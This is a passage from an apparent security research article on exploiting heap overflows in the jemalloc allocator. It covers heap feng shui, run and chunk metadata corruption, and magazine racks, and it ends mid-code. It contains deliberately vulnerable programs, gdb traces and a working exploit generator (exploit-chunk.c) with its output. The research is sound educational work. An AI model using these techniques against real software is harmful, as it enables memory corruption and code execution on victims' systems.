adjacent region to 'obj_a'. Finally, at the call of 'print()' by 'obj_b': gdb $ x/i $eip => 0x80486d8 : call *(%eax) gdb $ print $eax $16 = 0x41414141 ----[ 3.2 - Heap manipulation In order to be able to arrange the jemalloc heap in a predictable state we need to understand the allocator's behavior and use heap manipulation tactics to influence it to our advantage. In the context of browsers, heap manipulation tactics are usually referred to as 'Heap Feng Shui' after Alexander Sotirov's work [FENG]. By 'predictable state' we mean that the heap must be arranged as reliably as possible in a way that we can position data where we want. This enables us to use the tactic of corrupting adjacent regions of the previous paragraph, but also to exploit use-after-free bugs. In use-after-free bugs a memory region is allocated, used, freed and then used again due to a bug. In such a case if we know the region's size we can manipulate the heap to place data of our own choosing in the freed region's memory slot on its run before it is used again. Upon its subsequent incorrect use the region now has our data that can help us hijack the flow of execution. To explore jemalloc's behavior and manipulate it into a predictable state we use an algorithm similar to the one presented in [HOEJ]. Since in the general case we cannot know beforehand the state of the runs of the class size we are interested in, we perform many allocations of this size hoping to cover the holes (i.e. free regions) in the existing runs and get a fresh run. Hopefully the next series of allocations we will perform will be on this fresh run and therefore will be sequential. As we have seen, sequential allocations on a largely empty run are also contiguous. Next, we perform such a series of allocations controlled by us. In the case we are trying to use the adjacent regions corruption tactic, these allocations are of the victim object/structure we have chosen to help us gain code execution when corrupted. The following step is to deallocate every second region in this last series of controlled victim allocations. This will create holes in between the victim objects/structures on the run of the size class we are trying to manipulate. Finally, we trigger the heap overflow bug forcing, due to the state we have arranged, jemalloc to place the vulnerable objects in holes on the target run overflowing into the victim objects. Let's demonstrate the above discussion with an example (file test-holes.c in the code archive): #define TSIZE 0x10 /* target size class */ #define NALLOC 500 /* number of allocations */ #define NFREE (NALLOC / 10) /* number of deallocations */ char *foo[NALLOC]; char *bar[NALLOC]; printf("step 1: controlled allocations of victim objects\n"); for(i = 0; i < NALLOC; i++) { foo[i] = malloc(TSIZE); printf("foo[%d]:\t\t0x%x\n", i, (unsigned int)foo[i]); } printf("step 2: creating holes in between the victim objects\n"); for(i = (NALLOC - NFREE); i < NALLOC; i += 2) { printf("freeing foo[%d]:\t0x%x\n", i, (unsigned int)foo[i]); free(foo[i]); } printf("step 3: fill holes with vulnerable objects\n"); for(i = (NALLOC - NFREE + 1); i < NALLOC; i += 2) { bar[i] = malloc(TSIZE); printf("bar[%d]:\t0x%x\n", i, (unsigned int)bar[i]); } jemalloc's behavior can be observed in the output, remember that our target size class is 16 bytes: $ ./test-holes step 1: controlled allocations of victim objects foo[0]: 0x40201030 foo[1]: 0x40201040 foo[2]: 0x40201050 foo[3]: 0x40201060 foo[4]: 0x40201070 foo[5]: 0x40201080 foo[6]: 0x40201090 foo[7]: 0x402010a0 ... foo[447]: 0x40202c50 foo[448]: 0x40202c60 foo[449]: 0x40202c70 foo[450]: 0x40202c80 foo[451]: 0x40202c90 foo[452]: 0x40202ca0 foo[453]: 0x40202cb0 foo[454]: 0x40202cc0 foo[455]: 0x40202cd0 foo[456]: 0x40202ce0 foo[457]: 0x40202cf0 foo[458]: 0x40202d00 foo[459]: 0x40202d10 foo[460]: 0x40202d20 ... step 2: creating holes in between the victim objects freeing foo[450]: 0x40202c80 freeing foo[452]: 0x40202ca0 freeing foo[454]: 0x40202cc0 freeing foo[456]: 0x40202ce0 freeing foo[458]: 0x40202d00 freeing foo[460]: 0x40202d20 freeing foo[462]: 0x40202d40 freeing foo[464]: 0x40202d60 freeing foo[466]: 0x40202d80 freeing foo[468]: 0x40202da0 freeing foo[470]: 0x40202dc0 freeing foo[472]: 0x40202de0 freeing foo[474]: 0x40202e00 freeing foo[476]: 0x40202e20 freeing foo[478]: 0x40202e40 freeing foo[480]: 0x40202e60 freeing foo[482]: 0x40202e80 freeing foo[484]: 0x40202ea0 freeing foo[486]: 0x40202ec0 freeing foo[488]: 0x40202ee0 freeing foo[490]: 0x40202f00 freeing foo[492]: 0x40202f20 freeing foo[494]: 0x40202f40 freeing foo[496]: 0x40202f60 freeing foo[498]: 0x40202f80 step 3: fill holes with vulnerable objects bar[451]: 0x40202c80 bar[453]: 0x40202ca0 bar[455]: 0x40202cc0 bar[457]: 0x40202ce0 bar[459]: 0x40202d00 bar[461]: 0x40202d20 bar[463]: 0x40202d40 bar[465]: 0x40202d60 bar[467]: 0x40202d80 bar[469]: 0x40202da0 bar[471]: 0x40202dc0 bar[473]: 0x40202de0 bar[475]: 0x40202e00 bar[477]: 0x40202e20 bar[479]: 0x40202e40 bar[481]: 0x40202e60 bar[483]: 0x40202e80 bar[485]: 0x40202ea0 bar[487]: 0x40202ec0 bar[489]: 0x40202ee0 bar[491]: 0x40202f00 bar[493]: 0x40202f20 bar[495]: 0x40202f40 bar[497]: 0x40202f60 bar[499]: 0x40202f80 We can see that jemalloc works in a FIFO way; the first region freed is the first returned for a subsequent allocation request. Although our example mainly demonstrates how to manipulate the jemalloc heap to exploit adjacent region corruptions, our observations can also help us to exploit use-after-free vulnerabilities. When our goal is to get data of our own choosing in the same region as a freed region about to be used, jemalloc's FIFO behavior can he help us place our data in a predictable way. In the above discussion we have implicitly assumed that we can make arbitrary allocations and deallocations; i.e. that we have available in our exploitation tool belt allocation and deallocation primitives for our target size. Depending on the vulnerable application (that relies on jemalloc) this may or may not be straightforward. For example, if our target is a media player we may be able to control allocations by introducing an arbitrary number of metadata tags in the input file. In the case of Firefox we can of course use Javascript to implement our heap primitives. But that's the topic of another paper. ----[ 3.3 - Metadata corruption The final heap corruption primitive we will focus on is the corruption of metadata. We will once again remind you that since jemalloc is not based on freelists (it uses macro-based red black trees instead), unlink and frontlink exploitation techniques are not usable. We will instead pay attention on how we can force 'malloc()' return a pointer that points to already initialized heap regions. ------[ 3.3.1 - Run (arena_run_t) We have already defined what a 'run' is in section 2.1.3. We will briefly remind the reader that a 'run' is just a collection of memory regions of equal size that starts with some metadata describing it. Recall that runs are always aligned to a multiple of the page size (0x1000 in most real life applications). The run metadata obey the layout shown in [2-3]. For release builds the 'magic' field will not be present (that is, MALLOC_DEBUG is off by default). As we have already mentioned, each run contains a pointer to the bin whose regions it contains. The 'bin' pointer is read and dereferenced from 'arena_run_t' (see [2-3]) only during deallocation. On deallocation the region size is unknown, thus the bin index cannot be computed directly, instead, jemalloc will first find the run the memory to be freed is located and will then dereference the bin pointer stored in the run's header. From function 'arena_dalloc_small': arena_dalloc_small(arena_t *arena, arena_chunk_t *chunk, void *ptr, arena_chunk_map_t *mapelm) { arena_run_t *run; arena_bin_t *bin; size_t size; run = (arena_run_t *)(mapelm->bits & ~pagesize_mask); bin = run->bin; size = bin->reg_size; On the other hand, during the allocation process, once the appropriate run is located, its 'regs_mask[]' bit vector is examined in search of a free region. Note that the search for a free region starts at 'regs_mask[regs_minelm]' ('regs_minlem' holds the index of the first 'regs_mask[]' element that has nonzero bits). We will exploit this fact to force 'malloc()' return an already allocated region. In a heap overflow situation it is pretty common for the attacker to be able to overflow a memory region which is not followed by other regions (like the wilderness chunk in dlmalloc, but in jemalloc such regions are not that special). In such a situation, the attacker will most likely be able to overwrite the run header of the next run. Since runs hold memory regions of equal size, the next page aligned address will either be a normal page of the current run, or will contain the metadata (header) of the next run which will hold regions of different size (larger or smaller, it doesn't really matter). In the first case, overwriting adjacent regions of the same run is possible and thus an attacker can use the techniques that were previously discussed in 3.1. The latter case is the subject of the following paragraphs. People already familiar with heap exploitation, may recall that it is pretty common for an attacker to control the last heap item (region in our case) allocated, that is the most recently allocated region is the one being overflown. Because of the importance of this situation, we believe it is essential to have a look at how we can leverage it to gain control of the target process. Let's first have a look at how the in-memory model of a run looks like (file test-run.c): char *first; first = (char *)malloc(16); printf("first = %p\n", first); memset(first, 'A', 16); breakpoint(); free(first); The test program is compiled and a debugging build of jemalloc is loaded to be used with gdb. ~$ gcc -g -Wall test-run.c -o test-run ~$ export LD_PRELOAD=/usr/src/lib/libc/libc.so.7 ~$ gdb test-run GNU gdb 6.1.1 [FreeBSD] ... (gdb) run ... first = 0x28201030 Program received signal SIGTRAP, Trace/breakpoint trap. main () at simple.c:14 14 free(first); The call to malloc() returns the address 0x28201030 which belongs to the run at 0x28201000. (gdb) print *(arena_run_t *)0x28201000 $1 = {bin = 0x8049838, regs_minelm = 0, nfree = 252, regs_mask = {4294967294}} (gdb) print *(arena_bin_t *)0x8049838 $2 = {runcur = 0x28201000, runs = {...}, reg_size = 16, run_size = 4096, nregs = 253, regs_mask_nelms = 8, reg0_offset = 48} Oki doki, run 0x28201000 services the requests for memory regions of size 16 as indicated by the 'reg_size' value of the bin pointer stored in the run header (notice that run->bin->runcur == run). Now let's proceed with studying a scenario that can lead to 'malloc()' exploitation. For our example let's assume that the attacker controls a memory region 'A' which is the last in its run. [run #1 header][RR...RA][run #2 header][RR...] In the simple diagram shown above, 'R' stands for a normal region which may or may not be allocated while 'A' corresponds to the region that belongs to the attacker, i.e. it is the one that will be overflown. 'A' does not strictly need to be the last region of run #1. It can also be any region of the run. Let's explore how from a region on run #1 we can reach the metadata of run #2 (file test-runhdr.c, also see [2-6]): unsigned char code[] = "\x61\x62\x63\x64"; one = malloc(0x10); memset(one, 0x41, 0x10); printf("[+] region one:\t\t0x%x: %s\n", (unsigned int)one, one); two = malloc(0x10); memset(two, 0x42, 0x10); printf("[+] region two:\t\t0x%x: %s\n", (unsigned int)two, two); three = malloc(0x20); memset(three, 0x43, 0x20); printf("[+] region three:\t0x%x: %s\n", (unsigned int)three, three); __asm__("int3"); printf("[+] corrupting the metadata of region three's run\n"); memcpy(two + 4032, code, 4); __asm__("int3"); At the first breakpoint we can see that for size 16 the run is at 0xb7d01000 and for size 32 the run is at 0xb7d02000: gdb $ r [Thread debugging using libthread_db enabled] [+] region one: 0xb7d01030: AAAAAAAAAAAAAAAA [+] region two: 0xb7d01040: BBBBBBBBBBBBBBBB [+] region three: 0xb7d02020: CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC Program received signal SIGTRAP, Trace/breakpoint trap. gdb $ print arenas[0].bins[3].runcur $5 = (arena_run_t *) 0xb7d01000 gdb $ print arenas[0].bins[4].runcur $6 = (arena_run_t *) 0xb7d02000 The metadata of run 0xb7d02000 are: gdb $ x/30x 0xb7d02000 0xb7d02000: 0xb7fd3134 0x00000000 0x0000007e 0xfffffffe 0xb7d02010: 0xffffffff 0xffffffff 0x7fffffff 0x00000000 0xb7d02020: 0x43434343 0x43434343 0x43434343 0x43434343 0xb7d02030: 0x43434343 0x43434343 0x43434343 0x43434343 0xb7d02040: 0x00000000 0x00000000 0x00000000 0x00000000 After the memcpy() and at the second breakpoint: gdb $ x/30x 0xb7d02000 0xb7d02000: 0x64636261 0x00000000 0x0000007e 0xfffffffe 0xb7d02010: 0xffffffff 0xffffffff 0x7fffffff 0x00000000 0xb7d02020: 0x43434343 0x43434343 0x43434343 0x43434343 0xb7d02030: 0x43434343 0x43434343 0x43434343 0x43434343 0xb7d02040: 0x00000000 0x00000000 0x00000000 0x00000000 We can see that the run's metadata and specifically the address of the 'bin' element (see [2-3]) has been overwritten. One way or the other, the attacker will be able to alter the contents of run #2's header, but once this has happened, what's the potential of achieving code execution? A careful reader would have already thought the obvious; one can overwrite the 'bin' pointer to make it point to a fake bin structure of his own. Well, this is not a good idea because of two reasons. First, the attacker needs further control of the target process in order to successfully construct a fake bin header somewhere in memory. Secondly, and most importantly, as it has already been discussed, the 'bin' pointer of a region's run header is dereferenced only during deallocation. A careful study of the jemalloc source code reveals that only 'run->bin->reg0_offset' is actually used (somewhere in 'arena_run_reg_dalloc()'), thus, from an attacker's point of view, the bin pointer is not that interesting ('reg0_offset' overwrite may cause further problems as well leading to crashes and a forced interrupt of our exploit). Our attack consists of the following steps. The attacker overflows 'A' and overwrites run #2's header. Then, upon the next malloc() of a size equal to the size serviced by run #2, the user will get as a result a pointer to a memory region of the previous run (run #1 in our example). It is important to understand that in order for the attack to work, the overflown run should serve regions that belong to any of the available bins. Let's further examine our case (file vuln-run.c): char *one, *two, *three, *four, *temp; char offset[sizeof(size_t)]; int i; if(argc < 2) { printf("%s \n", argv[0]); return 0; } /* User supplied value for 'regs_minelm'. */ *(size_t *)&offset[0] = (size_t)atol(argv[1]); printf("Allocating a chunk of 16 bytes just for fun\n"); one = (char *)malloc(16); printf("one = %p\n", one); /* All those allocations will fall inside the same run. */ printf("Allocating first chunk of 32 bytes\n"); two = (char *)malloc(32); printf("two = %p\n", two); printf("Performing more 32 byte allocations\n"); for(i = 0; i < 10; i++) { temp = (char *)malloc(32); printf("temp = %p\n", temp); } /* This will allocate a new run for size 64. */ printf("Setting up a run for the next size class\n"); three = (char *)malloc(64); printf("three = %p\n", three); /* Overwrite 'regs_minelm' of the next run. */ breakpoint(); memcpy(two + 4064 + 4, offset, 4); breakpoint(); printf("Next chunk should point in the previous run\n"); four = (char *)malloc(64); printf("four = %p\n", four); vuln-run.c requires the user to supply a value to be written on 'regs_minelm' of the next run. To achieve reliable results we have to somehow control the memory contents at 'regs_mask[regs_minelm]' as well. By taking a closer look at the layout of 'arena_run_t', we can see that by supplying the value -2 for 'regs_minelm', we can force 'regs_mask[regs_minelm]' to point to 'regs_minelm' itself. That is, 'regs_minelm[-2] = -2' :) Well, depending on the target application, other values may also be applicable but -2 is a safe one that does not cause further problems in the internals of jemalloc and avoids forced crashes. From function 'arena_run_reg_alloc': static inline void * arena_run_reg_alloc(arena_run_t *run, arena_bin_t *bin) { void *ret; unsigned i, mask, bit, regind; ... i = run->regs_minelm; mask = run->regs_mask[i]; /* [3-4] */ if (mask != 0) { /* Usable allocation found. */ bit = ffs((int)mask) - 1; /* [3-5] */ regind = ((i << (SIZEOF_INT_2POW + 3)) + bit); /* [3-6] */ ... ret = (void *)(((uintptr_t)run) + bin->reg0_offset + (bin->reg_size * regind)); /* [3-7] */ ... return (ret); } ... } Initially, 'i' gets the value of 'run->regs_minelm' which is equal to -2. On the assignment at [3-4], 'mask' receives the value 'regs_mask[-2]' which happens to be the value of 'regs_minelm', that is -2. The binary representation of -2 is 0xfffffffe thus 'ffs()' (man ffs(3) for those who haven't used 'ffs()' before) will return 2, so, 'bit' will equal 1. As if it wasn't fucking tiring so far, at [3-6], 'regind' is computed as '((0xfffffffe << 5) + 1)' which equals 0xffffffc1 or -63. Now do the maths, for 'reg_size' values belonging to small-medium sized regions, the formula at [3-7] calculates 'ret' in such a way that 'ret' receives a pointer to a memory region 63 chunks backwards :) Now it's time for some hands on practice: ~$ gdb ./vuln-run GNU gdb 6.1.1 [FreeBSD] ... (gdb) run -2 Starting program: vuln-run -2 Allocating a chunk of 16 bytes just for fun one = 0x28202030 Allocating first chunk of 32 bytes two = 0x28203020 Performing more 32 byte allocations ... temp = 0x28203080 ... Setting up a run for the next size class three = 0x28204040 Program received signal SIGTRAP, Trace/breakpoint trap. main (argc=Error accessing memory address 0x0: Bad address. ) at vuln-run.c:35 35 memcpy(two + 4064 + 4, offset, 4); (gdb) c Continuing. Program received signal SIGTRAP, Trace/breakpoint trap. main (argc=Error accessing memory address 0x0: Bad address. ) at vuln-run.c:38 38 printf("Next chunk should point in the previous run\n"); (gdb) c Continuing. Next chunk should point in the previous run four = 0x28203080 Program exited normally. (gdb) q Notice how the memory region numbered 'four' (64 bytes) points exactly where the chunk named 'temp' (32 bytes) starts. Voila :) ------[ 3.3.2 - Chunk (arena_chunk_t) In the previous section we described the potential of achieving arbitrary code execution by overwriting the run header metadata. Trying to cover all the possibilities, we will now focus on what the attacker can do once she is able to corrupt the chunk header of an arena. Although the probability of directly affecting a nearby arena is low, a memory leak or the indirect control of the heap layout by continuous bin-sized allocations can render the technique described in this section a useful tool in the attacker's hand. Before continuing with our analysis, let's set the foundations of the test case we will cover. [[Arena #1 header][R...R][C...C]] As we have already mentioned in the previous sections, new arena chunks are created at will depending on whether the current arena is full (that is, jemalloc is unable to find a non-full run to service the current allocation) or whether the target application runs on multiple threads. Thus a good way to force the initialization of a new arena chunk is to continuously force the target application to perform allocations, preferably bin-sized ones. In the figure above, letter 'R' indicates the presence of memory regions that are already allocated while 'C' denotes regions that may be free. By continuously requesting memory regions, the available arena regions may be depleted forcing jemalloc to allocate a new arena (what is, in fact, allocated is a new chunk called an arena chunk, by calling 'arena_chunk_alloc()' which usually calls 'mmap()'). The low level function responsible for allocating memory pages (called 'pages_map()'), is used by 'chunk_alloc_mmap()' in a way that makes it possible for several distinct arenas (and any possible arena extensions) to be physically adjacent. So, once the attacker requests a bunch of new allocations, the memory layout may resemble the following figure. [[Arena #1 header][R...R][C...C]][[Arena #2 header][...]] It is now obvious that overflowing the last chunk of arena #1 will result in the arena chunk header of arena #2 getting overwritten. It is thus interesting to take a look at how one can take advantage of such a situation. The following code is one of those typical vulnerable-on-purpose programs you usually come across in Phrack articles ;) The scenario we will be analyzing in this section is the following: The attacker forces the target application to allocate a new arena by controlling the heap allocations. She then triggers the overflow in the last region of the previous arena (the region that physically borders the new arena) thus corrupting the chunk header metadata (see [2-5] on the diagram). When the application calls 'free()' on any region of the newly allocated arena, the jemalloc housekeeping information is altered. On the next call to 'malloc()', the allocator will return a region that points to already allocated space of (preferably) the previous arena. Take your time to carefully study the following snippet since it is essential for understanding this attack (full code in vuln-chunk.c): char *base1, *base2; char *p1, *p2, *p3, *last, *first; char buffer[1024]; int fd, l; p1 = (char *)malloc(16); base1 = (char *)CHUNK_ADDR2BASE(p1); print_arena_chunk(base1); /* [3-8] */ /* Simulate the fact that we somehow control heap allocations. * This will consume the first chunk, and will force jemalloc * to allocate a new chunk for this arena. */ last = NULL; while((base2 = (char *)CHUNK_ADDR2BASE((first = malloc(16)))) == base1) last = first; print_arena_chunk(base2); /* [3-9] */ /* Allocate one more region right after the first region of the * new chunk. This is done for demonstration purposes only. */ p2 = malloc(16); /* This is how the chunks look like at this point: * * [HAAAA....L][HFPUUUU....U] * * H: Chunk header * A: Allocated regions * L: The chunk pointed to by 'last' * F: The chunk pointed to by 'first' * P: The chunk pointed to by 'p2' * U: Unallocated space */ fprintf(stderr, "base1: %p vs. base2: %p (+%d)\n", base1, base2, (ptrdiff_t)(base2 - base1)); fprintf(stderr, "p1: %p vs. p2: %p (+%d)\n", p1, p2, (ptrdiff_t)(p2 - p1)); /* [3-10] */ if(argc > 1) { if((fd = open(argv[1], O_RDONLY)) > 0) { /* Read the contents of the given file. We assume this file * contains the exploitation vector. */ memset(buffer, 0, sizeof(buffer)); l = read(fd, buffer, sizeof(buffer)); close(fd); /* Copy data in the last chunk of the previous arena chunk. */ fprintf(stderr, "Read %d bytes\n", l); memcpy(last, buffer, l); } } /* [3-11] */ /* Trigger the bug by free()ing any chunk in the new arena. We * can achieve the same results by deallocating 'first'. */ free(p2); print_region(first, 16); /* [3-12] */ /* Now 'p3' will point to an already allocated region (in this * example, 'p3' will overwhelm 'first'). */ p3 = malloc(4096); /* [3-13] */ fprintf(stderr, "p3 = %p\n", p3); memset(p3, 'A', 4096); /* 'A's should appear in 'first' which was previously zeroed. */ print_region(first, 16); return 0; Before going further, the reader is advised to read the comments and the code above very carefully. You can safely ignore 'print_arena_chunk()' and 'print_region()', they are defined in the file lib.h found in the code archive and are used for debugging purposes only. The snippet is actually split in 6 parts which can be distinguished by their corresponding '[3-x]' tags. Briefly, in part [3-8], the vulnerable program performs a number of allocations in order to fill up the available space served by the first arena. This emulates the fact that an attacker somehow controls the order of allocations and deallocations on the target, a fair and very common prerequisite. Additionally, the last call to 'malloc()' (the one before the while loop breaks) forces jemalloc to allocate a new arena chunk and return the first available memory region. Part [3-9], performs one more allocation, one that will lie next to the first (that is the second region of the new arena). This final allocation is there for demonstration purposes only (check the comments for more details). Part [3-10] is where the actual overflow takes place and part [3-11] calls 'free()' on one of the regions of the newly allocated arena. Before explaining the rest of the vulnerable code, let's see what's going on when 'free()' gets called on a memory region. void free(void *ptr) { ... if (ptr != NULL) { ... idalloc(ptr); } } static inline void idalloc(void *ptr) { ... chunk = (arena_chunk_t *)CHUNK_ADDR2BASE(ptr); /* [3-14] */ if (chunk != ptr) arena_dalloc(chunk->arena, chunk, ptr); /* [3-15] */ else huge_dalloc(ptr); } The 'CHUNK_ADDR2BASE()' macro at [3-14] returns the pointer to the chunk that the given memory region belongs to. In fact, what it does is just a simple pointer trick to get the first address before 'ptr' that is aligned to a multiple of a chunk size (1 or 2 MB by default, depending on the jemalloc flavor used). If this chunk does not belong to a, so called, huge allocation, then the allocator knows that it definitely belongs to an arena. As previously stated, an arena chunk begins with a special header, called 'arena_chunk_t', which, as expected, contains a pointer to the arena that this chunk is part of. Now recall that in part [3-10] of the vulnerable snippet presented above, the attacker is able to overwrite the first few bytes of the next arena chunk. Consequently, the 'chunk->arena' pointer that points to the arena is under the attacker's control. From now on, the reader may safely assume that all functions called by 'arena_dalloc()' at [3-15] may receive an arbitrary value for the arena pointer: static inline void arena_dalloc(arena_t *arena, arena_chunk_t *chunk, void *ptr) { size_t pageind; arena_chunk_map_t *mapelm; ... pageind = (((uintptr_t)ptr - (uintptr_t)chunk) >> PAGE_SHIFT); mapelm = &chunk->map[pageind]; ... if ((mapelm->bits & CHUNK_MAP_LARGE) == 0) { /* Small allocation. */ malloc_spin_lock(&arena->lock); arena_dalloc_small(arena, chunk, ptr, mapelm); /* [3-16] */ malloc_spin_unlock(&arena->lock); } else arena_dalloc_large(arena, chunk, ptr); /* [3-17] */ } Entering 'arena_dalloc()', one can see that the 'arena' pointer is not used a lot, it's just passed to 'arena_dalloc_small()' or 'arena_dalloc_large()' depending on the size class of the memory region being deallocated. It is interesting to note that the aforementioned size class is determined by inspecting 'mapelm->bits' which, hopefully, is under the influence of the attacker. Following the path taken by 'arena_dalloc_small()' results in many complications that will most probably ruin our attack (hint for the interested reader - pointer arithmetics performed by 'arena_run_reg_dalloc()' are kinda dangerous). For this purpose, we choose to follow function 'arena_dalloc_large()': static void arena_dalloc_large(arena_t *arena, arena_chunk_t *chunk, void *ptr) { malloc_spin_lock(&arena->lock); ... size_t pageind = ((uintptr_t)ptr - (uintptr_t)chunk) >> PAGE_SHIFT; /* [3-18] */ size_t size = chunk->map[pageind].bits & ~PAGE_MASK; /* [3-19] */ ... arena_run_dalloc(arena, (arena_run_t *)ptr, true); malloc_spin_unlock(&arena->lock); } There are two important things to notice in the snippet above. The first thing to note is the way 'pageind' is calculated. Variable 'ptr' points to the start of the memory region to be free()'ed while 'chunk' is the address of the corresponding arena chunk. For a chunk that starts at e.g. 0x28200000, the first region to be given out to the user may start at 0x28201030 mainly because of the overhead involving the metadata of chunk, arena and run headers as well as their bitmaps. A careful reader may notice that 0x28201030 is more than a page far from the start of the chunk, so, 'pageind' is larger or equal to 1. It is for this purpose that we are mostly interested in overwriting 'chunk->map[1]' and not 'chunk->map[0]'. The second thing to catch our attention is the fact that, at [3-19], 'size' is calculated directly from the 'bits' element of the overwritten bitmap. This size is later converted to the number of pages comprising it, so, the attacker can directly affect the number of pages to be marked as free. Let's see 'arena_run_dalloc': static void arena_run_dalloc(arena_t *arena, arena_run_t *run, bool dirty) { arena_chunk_t *chunk; size_t size, run_ind, run_pages; chunk = (arena_chunk_t *)CHUNK_ADDR2BASE(run); run_ind = (size_t)(((uintptr_t)run - (uintptr_t)chunk) >> PAGE_SHIFT); ... if ((chunk->map[run_ind].bits & CHUNK_MAP_LARGE) != 0) size = chunk->map[run_ind].bits & ~PAGE_MASK; else ... run_pages = (size >> PAGE_SHIFT); /* [3-20] */ /* Mark pages as unallocated in the chunk map. */ if (dirty) { size_t i; for (i = 0; i < run_pages; i++) { ... /* [3-21] */ chunk->map[run_ind + i].bits = CHUNK_MAP_DIRTY; } ... chunk->ndirty += run_pages; arena->ndirty += run_pages; } else { ... } chunk->map[run_ind].bits = size | (chunk->map[run_ind].bits & PAGE_MASK); chunk->map[run_ind+run_pages-1].bits = size | (chunk->map[run_ind+run_pages-1].bits & PAGE_MASK); /* Page coalescing code - Not relevant for _this_ example. */ ... /* Insert into runs_avail, now that coalescing is complete. */ /* [3-22] */ arena_avail_tree_insert(&arena->runs_avail, &chunk->map[run_ind]); ... } Continuing with our analysis, one can see that at [3-20] the same size that was calculated in 'arena_dalloc_large()' is now converted to a number of pages and then all 'map[]' elements that correspond to these pages are marked as dirty (notice that 'dirty' argument given to 'arena_run_dalloc()' by 'arena_dalloc_large()' is always set to true). The rest of the 'arena_run_dalloc()' code, which is not shown here, is responsible for forward and backward coalescing of dirty pages. Although not directly relevant for our demonstration, it's something that an attacker should keep in mind while developing a real life reliable exploit. Last but not least, it's interesting to note that, since the attacker controls the 'arena' pointer, the map elements that correspond to the freed pages are inserted in the given arena's red black tree. This can be seen at [3-22] where 'arena_avail_tree_insert()' is actually called. One may think that since red-black trees are involved in jemalloc, she can abuse their pointer arithmetics to achieve a '4bytes anywhere' write primitive. We urge all interested readers to have a look at rb.h, the file that contains the macro-based red black tree implementation used by jemalloc (WARNING: don't try this while sober). Summing up, our attack algorithm consists of the following steps: 1) Force the target application to perform a number of allocations until a new arena is eventually allocated or until a neighboring arena is reached (call it arena B). This is mostly meaningful for our demonstration codes, since, in real life applications chances are that more than one chunks and/or arenas will be already available during the exploitation process. 2) Overwrite the 'arena' pointer of arena B's chunk and make it point to an already existing arena. The address of the very first arena of a process (call it arena A) is always fixed since it's declared as static. This will prevent the allocator from accessing a bad address and eventually segfaulting. 3) Force or let the target application free() any chunk that belongs to arena B. We can deallocate any number of pages as long as they are marked as allocated in the jemalloc metadata. Trying to free an unallocated page will result in the red-black tree implementation of jemalloc entering an endless loop or, rarely, segfaulting. 4) The next allocation to be served by arena B, will return a pointer somewhere within the region that was erroneously free()'ed in step 3. The exploit code for the vulnerable program presented in this section can be seen below. It was coded on an x86 FreeBSD-8.2-RELEASE system, so the offsets of the metadata may vary for your platform. Given the address of an existing arena (arena A of step 2), it creates a file that contains the exploitation vector. This file should be passed as argument to the vulnerable target (full code in file exploit-chunk.c): char buffer[1024], *p; int fd; if(argc != 2) { fprintf(stderr, "%s \n", argv[0]); return 0; } memset(buffer, 0, sizeof(buffer)); p = buffer; strncpy(p, "1234567890123456", 16); p += 16; /* Arena address. */ *(size_t *)p = (size_t)strtoul(argv[1], NULL, 16); p += sizeof(size_t); /* Skip over rbtree metadata and 'chunk->map[0]'. */ strncpy(p, "AAAA" "AAAA" "CCCC" "AAAA" "AAAA" "AAAA" "GGGG" "HHHH" , 32); p += 32; *(size_t *)p = 0x00001002; /* ^ CHUNK_MAP_LARGE */ /* ^ Number of pages to free (1 is ok). */ p += sizeof(size_t); fd = open("exploit2.v", O_WRONLY | O_TRUNC | O_CREAT, 0700); write(fd, buffer, (p - (char *)buffer)); close(fd); return 0; It is now time for some action. First, let's compile and run the vulnerable code. $ ./vuln-chunk # Chunk 0x28200000 belongs to arena 0x8049d98 # Chunk 0x28300000 belongs to arena 0x8049d98 ... # Region at 0x28301030 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ p3 = 0x28302000 # Region at 0x28301030 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ The output is what one expects it to be. First, the vulnerable code forces the allocator to initialize a new chunk (0x28300000) and then requests a memory region which is given the address 0x28301030. The next call to 'malloc()' returns 0x28302000. So far so good. Let's feed our target with the exploitation vector and see what happens. $ ./exploit-chunk 0x8049d98 $ ./vuln-chunk exploit2.v # Chunk 0x28200000 belongs to arena 0x8049d98 # Chunk 0x28300000 belongs to arena 0x8049d98 ... Read 56 bytes # Region at 0x28301030 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ p3 = 0x28301000 # Region at 0x28301030 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA As you can see the second call to 'malloc()' returns a new region 'p3 = 0x28301000' which lies 0x30 bytes before 'first' (0x28301030)! Okay, so you're now probably thinking if this technique is useful. Please note that the demonstration code presented in the previous two sections was carefully coded to prepare the heap in a way that is convenient for the attacker. It is for this purpose that these attacks may seem obscure at first. On the contrary, in real life applications, heap overflows in jemalloc will result in one of the following three cases: 1) Overwrite of an adjacent memory region. 2) Overwrite of the run metadata (in case the overflown region is the last in a run). 3) Overwrite of the arena chunk metadata (in case the overflown region is the last in a chunk). That said we believe we have covered most of the cases that an attacker may encounter. Feel free to contact us if you think we have missed something important. ------[ 3.3.3 - Thread caches (tcache_t) As we have analyzed in 2.1.7, thread cache magazine 'rounds' and other magazine metadata are placed in normal memory regions. Assuming a 'mag_t' along with its void pointer array has a total size of N, one can easily acquire a memory region in the same run by calling 'malloc(N)'. Overflowing a memory region adjacent to a 'mag_t' can result in 'malloc()' returning arbitrary attacker controlled addresses. It's just a matter of overwriting 'nrounds' and the contents of the void pointer array to contain a stack address (or any other address of interest). A careful reader of section 2.1.7 would have probably noticed that the same result can be achieved by giving 'nrounds' a sufficiently large value in order to pivot in the stack (or any user controlled memory region). This scenario is pretty straightforward to exploit, so, we will have a look at the case of overwriting a 'mag_rack_t' instead (it's not that sophisticated either). Magazine racks are allocated by 'mag_rack_alloc()': mag_rack_t * mag_rack_create(arena_t *arena) { ... return (arena_malloc_small(arena, sizeof(mag_rack_t) + (sizeof(bin_mags_t) * (nbins - 1)), true)); } Now, let's calculate the size of a magazine rack: (gdb) print nbins $6 = 30 (gdb) print sizeof(mag_rack_t) + (sizeof(bin_mags_t) * (nbins - 1)) $24 = 240 A size of 240 is actually serviced by the bin holding regions of 256 bytes. Issuing calls to 'malloc(256)' will eventually end up in a user controlled region physically bordering a 'mag_rack_t'. The following vulnerable code emulates this situation (file vuln-mag.c): /* The 'vulnerable' thread. */ void *vuln_thread_runner(void *arg) { char *v; v = (char *)malloc(256); /* [3-25] */ printf("[vuln] v = %p\n", v); sleep(2); if(arg) strcpy(v, (char *)arg); return NULL; } /* Other threads performing allocations. */ void *thread_runner(void *arg) { size_t self = 